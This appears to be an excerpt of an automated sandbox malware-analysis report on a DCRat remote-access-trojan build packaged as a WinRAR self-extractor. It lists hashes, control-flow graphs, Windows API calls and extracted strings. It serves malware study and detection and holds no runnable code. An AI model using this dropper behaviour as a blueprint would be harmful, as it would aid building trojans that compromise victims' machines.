                                  • Instruction ID: bc893f547675b7c8c664cd343806a1c340d0ff1c39b5f998907ce524d4dc91c9
                                  • Opcode Fuzzy Hash: 389b01a642f63341d3d651b64db34690dc23cdff3b558cc91a7c5ba06c9d0b35
                                  • Instruction Fuzzy Hash: 60E0BF31019548AFDF11AF78DD49A593B69FB48751F108414FA09CA222DB35DE42DA51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog_memcmp
                                  • String ID:
                                  • API String ID: 3004599000-0
                                  • Opcode ID: 3355d7d8d0ec9da3bbb1f45f843562a5c43de93dc972c713904ab800220648ed
                                  • Instruction ID: 595bafc6c261475fb4adcd9fa079b3c9bedef059f02ded18fe0a4e8f1baf8237
                                  • Opcode Fuzzy Hash: 3355d7d8d0ec9da3bbb1f45f843562a5c43de93dc972c713904ab800220648ed
                                  • Instruction Fuzzy Hash: D482E770904245EEDF25DB64C885BFABBA9FF15304F0842BBE899DB342DB315A44CB61
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008EAEE5
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prologItemTextWindow
                                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\RarSFX0$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                  • API String ID: 810644672-1559379598
                                  • Opcode ID: 8bb75df9f8b9ff428c6657b3974aab184ef5edcf2d49c3c7da7c93765d8582d3
                                  • Instruction ID: 71451e1a7b7d0c8e42e0b27a086a1a3bd37f5d5b05b9cb1fc38d4917d58fa107
                                  • Opcode Fuzzy Hash: 8bb75df9f8b9ff428c6657b3974aab184ef5edcf2d49c3c7da7c93765d8582d3
                                  • Instruction Fuzzy Hash: AD42E270A58294BEEB21ABA59C8AFEF3B7CFB02704F004155F645E61E1CB745D44EB22

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 257 8e00cf-8e00ee call 8ee360 GetModuleHandleW 260 8e0154-8e03b2 257->260 261 8e00f0-8e0107 GetProcAddress 257->261 262 8e03b8-8e03c3 call 8f70dd 260->262 263 8e0484-8e04b3 GetModuleFileNameW call 8dbc85 call 8dfe56 260->263 264 8e0109-8e011f 261->264 265 8e0121-8e0131 GetProcAddress 261->265 262->263 274 8e03c9-8e03fa GetModuleFileNameW CreateFileW 262->274 279 8e04b5-8e04bf call 8dacf5 263->279 264->265 265->260 266 8e0133-8e0152 265->266 266->260 276 8e03fc-8e040a SetFilePointer 274->276 277 8e0478-8e047f CloseHandle 274->277 276->277 280 8e040c-8e0429 ReadFile 276->280 277->263 286 8e04cc 279->286 287 8e04c1-8e04c5 call 8e0085 279->287 280->277 282 8e042b-8e0450 280->282 284 8e046d-8e0476 call 8dfbd8 282->284 284->277 294 8e0452-8e046c call 8e0085 284->294 288 8e04ce-8e04d0 286->288 291 8e04ca 287->291 292 8e04f2-8e0518 call 8dbcfb GetFileAttributesW 288->292 293 8e04d2-8e04f0 CompareStringW 288->293 291->288 296 8e051a-8e051e 292->296 301 8e0522 292->301 293->292 293->296 294->284 296->279 300 8e0520 296->300 302 8e0526-8e0528 300->302 301->302 303 8e052a 302->303 304 8e0560-8e0562 302->304 307 8e052c-8e0552 call 8dbcfb GetFileAttributesW 303->307 305 8e066f-8e0679 304->305 306 8e0568-8e057f call 8dbccf call 8dacf5 304->306 317 8e05e7-8e061a call 8d400a AllocConsole 306->317 318 8e0581-8e05e2 call 8e0085 * 2 call 8dddd1 call 8d400a call 8dddd1 call 8e9f35 306->318 313 8e055c 307->313 314 8e0554-8e0558 307->314 313->304 314->307 315 8e055a 314->315 315->304 323 8e061c-8e0661 GetCurrentProcessId AttachConsole call 8f35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 8e0667-8e0669 ExitProcess 317->324 318->324 323->324
                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 008E00E4
                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E00F6
                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E0127
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008E03D4
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008E03F0
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008E0402
                                  • ReadFile.KERNEL32(00000000,?,00007FFE,00903BA4,00000000), ref: 008E0421
                                  • CloseHandle.KERNEL32(00000000), ref: 008E0479
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008E048F
                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008E04E7
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 008E0510
                                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 008E054A
                                    • Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
                                    • Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2
                                  • _swprintf.LIBCMT ref: 008E05BE
                                  • _swprintf.LIBCMT ref: 008E060A
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                  • AllocConsole.KERNEL32 ref: 008E0612
                                  • GetCurrentProcessId.KERNEL32 ref: 008E061C
                                  • AttachConsole.KERNEL32(00000000), ref: 008E0623
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008E0649
                                  • WriteConsoleW.KERNEL32(00000000), ref: 008E0650
                                  • Sleep.KERNEL32(00002710), ref: 008E065B
                                  • FreeConsole.KERNEL32 ref: 008E0661
                                  • ExitProcess.KERNEL32 ref: 008E0669
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                  • API String ID: 1201351596-3298887752
                                  • Opcode ID: a357587760e6dad70f0411d9206dc7b170c73de98be36d9715749923d500cbbd
                                  • Instruction ID: 7c19195900f2bab29ee2af624879c318b76ca2dbb1ac068015cba6527958dbad
                                  • Opcode Fuzzy Hash: a357587760e6dad70f0411d9206dc7b170c73de98be36d9715749923d500cbbd
                                  • Instruction Fuzzy Hash: E9D14EB1519384AFD3309F55D849B9BBBFCFB85708F10891DF689D6290DBB086488F62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 406 8ebdf5-8ebe0d call 8ee28c call 8ee360 411 8ebe13-8ebe3d call 8eaa36 406->411 412 8eca90-8eca9d 406->412 411->412 415 8ebe43-8ebe48 411->415 416 8ebe49-8ebe57 415->416 417 8ebe58-8ebe6d call 8ea6c7 416->417 420 8ebe6f 417->420 421 8ebe71-8ebe86 call 8e17ac 420->421 424 8ebe88-8ebe8c 421->424 425 8ebe93-8ebe96 421->425 424->421 426 8ebe8e 424->426 427 8eca5c-8eca87 call 8eaa36 425->427 428 8ebe9c 425->428 426->427 427->416 443 8eca8d-8eca8f 427->443 429 8ec074-8ec076 428->429 430 8ec115-8ec117 428->430 431 8ec132-8ec134 428->431 432 8ebea3-8ebea6 428->432 429->427 436 8ec07c-8ec088 429->436 430->427 434 8ec11d-8ec12d SetWindowTextW 430->434 431->427 435 8ec13a-8ec141 431->435 432->427 437 8ebeac-8ebf06 call 8e9da4 call 8db965 call 8da49d call 8da5d7 call 8d70bf 432->437 434->427 435->427 439 8ec147-8ec160 435->439 440 8ec09c-8ec0a1 436->440 441 8ec08a-8ec09b call 8f7168 436->441 492 8ec045-8ec05a call 8da52a 437->492 444 8ec168-8ec176 call 8f35b3 439->444 445 8ec162 439->445 448 8ec0ab-8ec0b6 call 8eab9a 440->448 449 8ec0a3-8ec0a9 440->449 441->440 443->412 444->427 462 8ec17c-8ec185 444->462 445->444 453 8ec0bb-8ec0bd 448->453 449->453 455 8ec0bf-8ec0c6 call 8f35b3 453->455 456 8ec0c8-8ec0e8 call 8f35b3 call 8f35de 453->456 455->456 481 8ec0ea-8ec0f1 456->481 482 8ec101-8ec103 456->482 466 8ec1ae-8ec1b1 462->466 467 8ec187-8ec18b 462->467 469 8ec296-8ec2a4 call 8dfe56 466->469 470 8ec1b7-8ec1ba 466->470 467->466 472 8ec18d-8ec195 467->472 490 8ec2a6-8ec2ba call 8f17cb 469->490 474 8ec1bc-8ec1c1 470->474 475 8ec1c7-8ec1e2 470->475 472->427 478 8ec19b-8ec1a9 call 8dfe56 472->478 474->469 474->475 493 8ec22c-8ec233 475->493 494 8ec1e4-8ec21e 475->494 478->490 487 8ec0f8-8ec100 call 8f7168 481->487 488 8ec0f3-8ec0f5 481->488 482->427 489 8ec109-8ec110 call 8f35ce 482->489 487->482 488->487 489->427 505 8ec2bc-8ec2c0 490->505 506 8ec2c7-8ec318 call 8dfe56 call 8ea8d0 GetDlgItem SetWindowTextW SendMessageW call 8f35e9 490->506 511 8ebf0b-8ebf1f SetFileAttributesW 492->511 512 8ec060-8ec06f call 8da4b3 492->512 502 8ec235-8ec24d call 8f35b3 493->502 503 8ec261-8ec284 call 8f35b3 * 2 493->503 529 8ec222-8ec224 494->529 530 8ec220 494->530 502->503 516 8ec24f-8ec25c call 8dfe2e 502->516 503->490 534 8ec286-8ec294 call 8dfe2e 503->534 505->506 513 8ec2c2-8ec2c4 505->513 540 8ec31d-8ec321 506->540 517 8ebfc5-8ebfd5 GetFileAttributesW 511->517 518 8ebf25-8ebf58 call 8db4f7 call 8db207 call 8f35b3 511->518 512->427 513->506 516->503 517->492 527 8ebfd7-8ebfe6 DeleteFileW 517->527 549 8ebf5a-8ebf69 call 8f35b3 518->549 550 8ebf6b-8ebf79 call 8db925 518->550 527->492 533 8ebfe8-8ebfeb 527->533 529->493 530->529 537 8ebfef-8ec01b call 8d400a GetFileAttributesW 533->537 534->490 547 8ebfed-8ebfee 537->547 548 8ec01d-8ec033 MoveFileW 537->548 540->427 544 8ec327-8ec33b SendMessageW 540->544 544->427 547->537 548->492 551 8ec035-8ec03f MoveFileExW 548->551 549->550 556 8ebf7f-8ebfbe call 8f35b3 call 8ef350 549->556 550->512 550->556 551->492 556->517
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008EBDFA
                                    • Part of subcall function 008EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008EAAFE
                                  • SetWindowTextW.USER32(?,?), ref: 008EC127
                                  • _wcsrchr.LIBVCRUNTIME ref: 008EC2B1
                                  • GetDlgItem.USER32(?,00000066), ref: 008EC2EC
                                  • SetWindowTextW.USER32(00000000,?), ref: 008EC2FC
                                  • SendMessageW.USER32(00000000,00000143,00000000,0091A472), ref: 008EC30A
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008EC335
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                  • API String ID: 3564274579-312220925
                                  • Opcode ID: 0ca5b6c8723cd4dfa09a78a81b20c85836febf2f1c11ff6967e76d591af6e228
                                  • Instruction ID: 0497978e76eb2f70b0a5c377bc71cc0efdbc55fe0ebb928e10b394d0a45b1795
                                  • Opcode Fuzzy Hash: 0ca5b6c8723cd4dfa09a78a81b20c85836febf2f1c11ff6967e76d591af6e228
                                  • Instruction Fuzzy Hash: 61E18D72D04268AADB25EBA5DC49DEF73BCFF09310F0041A6F609E3191EB709A859B51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 561 8dd341-8dd378 call 8ee28c call 8ee360 call 8f15e8 568 8dd3ab-8dd3b4 call 8dfe56 561->568 569 8dd37a-8dd3a9 GetModuleFileNameW call 8dbc85 call 8dfe2e 561->569 573 8dd3b9-8dd3dd call 8d9619 call 8d99b0 568->573 569->573 580 8dd7a0-8dd7a6 call 8d9653 573->580 581 8dd3e3-8dd3eb 573->581 585 8dd7ab-8dd7bb 580->585 583 8dd3ed-8dd405 call 8e3781 * 2 581->583 584 8dd409-8dd438 call 8f5a90 * 2 581->584 595 8dd407 583->595 594 8dd43b-8dd43e 584->594 596 8dd56c-8dd58f call 8d9d30 call 8f35d3 594->596 597 8dd444-8dd44a call 8d9e40 594->597 595->584 596->580 606 8dd595-8dd5b0 call 8d9bf0 596->606 601 8dd44f-8dd476 call 8d9bf0 597->601 607 8dd47c-8dd484 601->607 608 8dd535-8dd538 601->608 620 8dd5b9-8dd5cc call 8f35d3 606->620 621 8dd5b2-8dd5b7 606->621 610 8dd4af-8dd4ba 607->610 611 8dd486-8dd48e 607->611 612 8dd53b-8dd55d call 8d9d30 608->612 615 8dd4bc-8dd4c8 610->615 616 8dd4e5-8dd4ed 610->616 611->610 614 8dd490-8dd4aa call 8f5ec0 611->614 612->594 631 8dd563-8dd566 612->631 637 8dd4ac 614->637 638 8dd52b-8dd533 614->638 615->616 623 8dd4ca-8dd4cf 615->623 618 8dd4ef-8dd4f7 616->618 619 8dd519-8dd51d 616->619 618->619 625 8dd4f9-8dd513 call 8f5ec0 618->625 619->608 626 8dd51f-8dd522 619->626 620->580 642 8dd5d2-8dd5ee call 8e137a call 8f35ce 620->642 627 8dd5f1-8dd5f8 621->627 623->616 630 8dd4d1-8dd4e3 call 8f5808 623->630 625->580 625->619 626->607 633 8dd5fc-8dd625 call 8dfdfb call 8f35d3 627->633 634 8dd5fa 627->634 630->616 643 8dd527 630->643 631->580 631->596 651 8dd627-8dd62e call 8f35ce 633->651 652 8dd633-8dd649 633->652 634->633 637->610 638->612 642->627 643->638 651->580 654 8dd64f-8dd65d 652->654 655 8dd731-8dd757 call 8dce72 call 8f35ce * 2 652->655 658 8dd664-8dd669 654->658 691 8dd759-8dd76f call 8e3781 * 2 655->691 692 8dd771-8dd79d call 8f5a90 * 2 655->692 660 8dd97c-8dd984 658->660 661 8dd66f-8dd678 658->661 662 8dd72b-8dd72e 660->662 663 8dd98a-8dd98e 660->663 665 8dd67a-8dd67e 661->665 666 8dd684-8dd68b 661->666 662->655 669 8dd9de-8dd9e4 663->669 670 8dd990-8dd996 663->670 665->660 665->666 667 8dd691-8dd6b6 666->667 668 8dd880-8dd891 call 8dfcbf 666->668 674 8dd6b9-8dd6de call 8f35b3 call 8f5808 667->674 693 8dd897-8dd8c0 call 8dfe56 call 8f5885 668->693 694 8dd976-8dd979 668->694 672 8dda0a-8dda2a call 8dce72 669->672 673 8dd9e6-8dd9ec 669->673 675 8dd99c-8dd9a3 670->675 676 8dd722-8dd725 670->676 696 8dda02-8dda05 672->696 673->672 679 8dd9ee-8dd9f4 673->679 710 8dd6f6 674->710 711 8dd6e0-8dd6ea 674->711 682 8dd9ca 675->682 683 8dd9a5-8dd9a8 675->683 676->658 676->662 679->676 686 8dd9fa-8dda01 679->686 695 8dd9cc-8dd9d9 682->695 689 8dd9aa-8dd9ad 683->689 690 8dd9c6-8dd9c8 683->690 686->696 698 8dd9af-8dd9b2 689->698 699 8dd9c2-8dd9c4 689->699 690->695 691->692 692->580 693->694 720 8dd8c6-8dd93c call 8e1596 call 8dfdfb call 8dfdd4 call 8dfdfb call 8f58d9 693->720 694->660 695->676 704 8dd9be-8dd9c0 698->704 705 8dd9b4-8dd9b8 698->705 699->695 704->695 705->679 712 8dd9ba-8dd9bc 705->712 717 8dd6f9-8dd6fd 710->717 711->710 716 8dd6ec-8dd6f4 711->716 712->695 716->717 717->674 721 8dd6ff-8dd706 717->721 754 8dd93e-8dd947 720->754 755 8dd94a-8dd95f 720->755 723 8dd70c-8dd71a call 8dfdfb 721->723 724 8dd7be-8dd7c1 721->724 731 8dd71f 723->731 724->668 726 8dd7c7-8dd7ce 724->726 729 8dd7d6-8dd7d7 726->729 730 8dd7d0-8dd7d4 726->730 729->726 730->729 733 8dd7d9-8dd7e7 730->733 731->676 735 8dd7e9-8dd7ec 733->735 736 8dd808-8dd830 call 8e1596 733->736 738 8dd7ee-8dd803 735->738 739 8dd805 735->739 743 8dd853-8dd85b 736->743 744 8dd832-8dd84e call 8f35e9 736->744 738->735 738->739 739->736 747 8dd85d 743->747 748 8dd862-8dd87b call 8ddd6b 743->748 744->731 747->748 748->731 754->755 756 8dd960-8dd967 755->756 757 8dd969-8dd96d 756->757 758 8dd973-8dd974 756->758 757->731 757->758 758->756
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008DD346
                                  • _wcschr.LIBVCRUNTIME ref: 008DD367
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,008DD328,?), ref: 008DD382
                                  • __fprintf_l.LIBCMT ref: 008DD873
                                    • Part of subcall function 008E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008DB652,00000000,?,?,?,00010494), ref: 008E1396
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                  • API String ID: 4184910265-980926923
                                  • Opcode ID: 5f94f8be3be945a885cb1c67b6331785169b64b11195bd7f6f7650b51d38eb13
                                  • Instruction ID: 1d37c1d8cc24f58d157d8f384e34e9f34457221f72d34a8533f29032d383e3f8
                                  • Opcode Fuzzy Hash: 5f94f8be3be945a885cb1c67b6331785169b64b11195bd7f6f7650b51d38eb13
                                  • Instruction Fuzzy Hash: 4C12B071900319AADF24EFA8DC81BEEB7B5FF44304F10466AE605E7381EB719A41CB65

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 008EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
                                    • Part of subcall function 008EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
                                    • Part of subcall function 008EAC74: IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
                                    • Part of subcall function 008EAC74: TranslateMessage.USER32(?), ref: 008EACB8
                                    • Part of subcall function 008EAC74: DispatchMessageW.USER32(?), ref: 008EACC2
                                  • GetDlgItem.USER32(00000068,0092ECB0), ref: 008ECB6E
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,008EA632,00000001,?,?,008EAECB,00904F88,0092ECB0), ref: 008ECB96
                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008ECBA1
                                  • SendMessageW.USER32(00000000,000000C2,00000000,009035B4), ref: 008ECBAF
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008ECBC5
                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008ECBDF
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008ECC23
                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008ECC31
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008ECC40
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008ECC67
                                  • SendMessageW.USER32(00000000,000000C2,00000000,0090431C), ref: 008ECC76
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                  • String ID: \
                                  • API String ID: 3569833718-2967466578
                                  • Opcode ID: 8a446c05226e66e80068e909949cfbfe6e8344e08863e17895ccb82d672b37aa
                                  • Instruction ID: f379d6fdc46da5ad1f33f929f865e5141d7f1ec1b0f8751fed98568f360040a0
                                  • Opcode Fuzzy Hash: 8a446c05226e66e80068e909949cfbfe6e8344e08863e17895ccb82d672b37aa
                                  • Instruction Fuzzy Hash: 4831CD71299742BFE301DF20DC4AFAB7FACEB82704F000518FA51961E1DB645908EBB6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 770 8e9e1c-8e9e38 FindResourceW 771 8e9e3e-8e9e50 SizeofResource 770->771 772 8e9f2f-8e9f32 770->772 773 8e9e52-8e9e61 LoadResource 771->773 774 8e9e70-8e9e72 771->774 773->774 775 8e9e63-8e9e6e LockResource 773->775 776 8e9f2e 774->776 775->774 777 8e9e77-8e9e8c GlobalAlloc 775->777 776->772 778 8e9f28-8e9f2d 777->778 779 8e9e92-8e9e9b GlobalLock 777->779 778->776 780 8e9f21-8e9f22 GlobalFree 779->780 781 8e9ea1-8e9ebf call 8ef4b0 779->781 780->778 785 8e9f1a-8e9f1b GlobalUnlock 781->785 786 8e9ec1-8e9ee3 call 8e9d7b 781->786 785->780 786->785 791 8e9ee5-8e9eed 786->791 792 8e9eef-8e9f03 GdipCreateHBITMAPFromBitmap 791->792 793 8e9f08-8e9f16 791->793 792->793 794 8e9f05 792->794 793->785 794->793
                                  APIs
                                  • FindResourceW.KERNEL32(008EAE4D,PNG,?,?,?,008EAE4D,00000066), ref: 008E9E2E
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,008EAE4D,00000066), ref: 008E9E46
                                  • LoadResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E59
                                  • LockResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E64
                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,008EAE4D,00000066), ref: 008E9E82
                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,008EAE4D,00000066), ref: 008E9E93
                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008E9EFC
                                  • GlobalUnlock.KERNEL32(00000000), ref: 008E9F1B
                                  • GlobalFree.KERNEL32(00000000), ref: 008E9F22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                  • String ID: PNG
                                  • API String ID: 4097654274-364855578
                                  • Opcode ID: f542b82c1a378323a9fb652c9ef4ed34982efa3b4321c817d036aa4afcb910ca
                                  • Instruction ID: ac9451dcc23334fd28bf728f78bbb8a99b9a465f302a71c66fd55f698a09a7ac
                                  • Opcode Fuzzy Hash: f542b82c1a378323a9fb652c9ef4ed34982efa3b4321c817d036aa4afcb910ca
                                  • Instruction Fuzzy Hash: EC31847121C346AFC7109F67EC4896BBBADFF8A755B048518F942D2260EBB1DC00DB61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
